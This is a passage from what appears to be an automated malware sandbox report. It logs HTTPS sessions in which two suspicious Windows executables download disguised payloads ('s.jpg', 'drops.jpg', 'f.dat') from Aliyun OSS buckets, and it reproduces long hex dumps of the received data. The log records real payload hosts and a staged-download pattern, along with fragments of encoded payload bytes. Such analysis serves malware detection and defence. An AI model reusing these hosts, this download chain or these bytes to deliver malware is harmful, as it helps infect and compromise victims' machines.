?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2025-01-06 03:50:52 UTC	4096	IN	Data Raw: 38 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f Data Ascii: 80JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKS
2025-01-06 03:50:52 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-06 03:50:52 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-06 03:50:52 UTC	4096	IN	Data Raw: 67 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed Data Ascii: gG<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-06 03:50:52 UTC	161	IN	Data Raw: 27 bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 d6 25 76 d5 Data Ascii: 'VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS%v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49989	39.103.20.26	443	3916	C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:50:53 UTC	111	OUT	GET /s.jpg HTTP/1.1 User-Agent: GetData Host: hu5wd1.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:50:54 UTC	544	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:50:53 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 677B531D820F3F3038FEA885 Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Sun, 05 Jan 2025 09:00:14 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 10
2025-01-06 03:50:54 UTC	3552	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-06 03:50:54 UTC	4096	IN	Data Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2025-01-06 03:50:54 UTC	651	IN	Data Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49992	118.178.60.9	443	3476	C:\Users\user\Documents\7tqorj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:51:15 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:51:15 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:51:15 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 677B533353726E353130A329 Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 4
2025-01-06 03:51:15 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2025-01-06 03:51:15 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
2025-01-06 03:51:15 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
2025-01-06 03:51:15 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2025-01-06 03:51:15 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2025-01-06 03:51:15 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2025-01-06 03:51:15 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2025-01-06 03:51:15 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2025-01-06 03:51:15 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2025-01-06 03:51:15 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49993	118.178.60.9	443	3476	C:\Users\user\Documents\7tqorj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:51:18 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:51:18 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:51:18 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 677B53366A91E5373937C082 Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 5
2025-01-06 03:51:18 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 